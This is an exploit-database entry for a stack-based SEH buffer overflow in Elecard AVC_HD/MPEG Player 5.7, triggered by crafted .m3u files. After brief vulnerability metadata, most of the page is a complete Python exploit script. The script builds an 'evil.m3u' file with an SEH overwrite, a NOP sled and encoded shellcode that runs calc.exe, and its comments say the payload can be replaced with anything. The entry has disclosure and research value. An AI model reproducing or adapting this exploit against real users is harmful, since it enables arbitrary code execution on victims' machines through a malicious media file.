Elecard AVC_HD/MPEG Player 5.7 (SEH)

vendor:

AVC_HD/MPEG Player

by:

sickness

9.3

CVSS

HIGH

Stack-based Buffer Overflow

119

CWE

Product Name: AVC_HD/MPEG Player

Affected Version From: 5.7

Affected Version To: 5.7

Patch Exists: NO

Related CWE: N/A

CPE: a:elecard:avc_hd/mpeg_player:5.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional SP3

2011

Elecard AVC_HD/MPEG Player 5.7 (SEH)

Elecard AVC_HD/MPEG Player 5.7 is vulnerable to a stack-based buffer overflow vulnerability when processing specially crafted .m3u files. An attacker can exploit this vulnerability by sending a malicious .m3u file to the victim, which when opened in the vulnerable application, can lead to arbitrary code execution.

Mitigation:

No fix available

Source

Exploit-DB raw data:

#!/usr/bin/env python
# Software: Elecard AVC_HD/MPEG Player 5.7 (SEH)
# Author: sickness
# Download : http://www.elecard.com/en/products/end-user-software/playback/avchd-player.html
# PoC for Elecard MPEG: http://www.exploit-db.com/exploits/16237/
# Tested : Windows XP Professional SP3 (EN) latest updates
# DATE   : 26/02/2011
# Bad chars: \x00\x0a\x0d\x25\x68\x08 There might be more so watch out !
###################################################################
# You might need to change the offset.
# The payload can be replaced with whatever you want, there is enough space.
# 3/05/2011 - Vendor notified, NO FIX coming up
###################################################################

import sys

header="#EXTM3U\n"

junk="\x42"*4
nseh="\xeb\x06\x90\x90"
seh="\xA6\xA0\x94\x73"	# p/p/r from D3DIM700.DLL
nops = "\x90"*16

# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b "\x00\x0a\x0d\x25\x68\x08" -t c
sc = ("\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfd\x1e"
"\x9f\xec\x83\xeb\xfc\xe2\xf4\x01\xf6\x16\xec\xfd\x1e\xff\x65"
"\x18\x2f\x4d\x88\x76\x4c\xaf\x67\xaf\x12\x14\xbe\xe9\x95\xed"
"\xc4\xf2\xa9\xd5\xca\xcc\xe1\xae\x2c\x51\x22\xfe\x90\xff\x32"
"\xbf\x2d\x32\x13\x9e\x2b\x1f\xee\xcd\xbb\x76\x4c\x8f\x67\xbf"
"\x22\x9e\x3c\x76\x5e\xe7\x69\x3d\x6a\xd5\xed\x2d\x4e\x14\xa4"
"\xe5\x95\xc7\xcc\xfc\xcd\x7c\xd0\xb4\x95\xab\x67\xfc\xc8\xae"
"\x13\xcc\xde\x33\x2d\x32\x13\x9e\x2b\xc5\xfe\xea\x18\xfe\x63"
"\x67\xd7\x80\x3a\xea\x0e\xa5\x95\xc7\xc8\xfc\xcd\xf9\x67\xf1"
"\x55\x14\xb4\xe1\x1f\x4c\x67\xf9\x95\x9e\x3c\x74\x5a\xbb\xc8"
"\xa6\x45\xfe\xb5\xa7\x4f\x60\x0c\xa5\x41\xc5\x67\xef\xf5\x19"
"\xb1\x97\x1f\x12\x69\x44\x1e\x9f\xec\xad\x76\xae\x67\x92\x99"
"\x60\x39\x46\xee\x2a\x4e\xab\x76\x39\x79\x40\x83\x60\x39\xc1"
"\x18\xe3\xe6\x7d\xe5\x7f\x99\xf8\xa5\xd8\xff\x8f\x71\xf5\xec"
"\xae\xe1\x4a\x8f\x9c\x72\xfc\xc2\x98\x66\xfa\xec")
rest = "\x90"*(21000-len(header+junk+nseh+seh+nops+sc))

exploit = header +junk + nseh + seh + nops + sc + rest
 
try:
	f=open("evil.m3u","w")
	f.write(exploit)
	f.close()
    	print "Done!"
except:
    	print "Something went wrong!"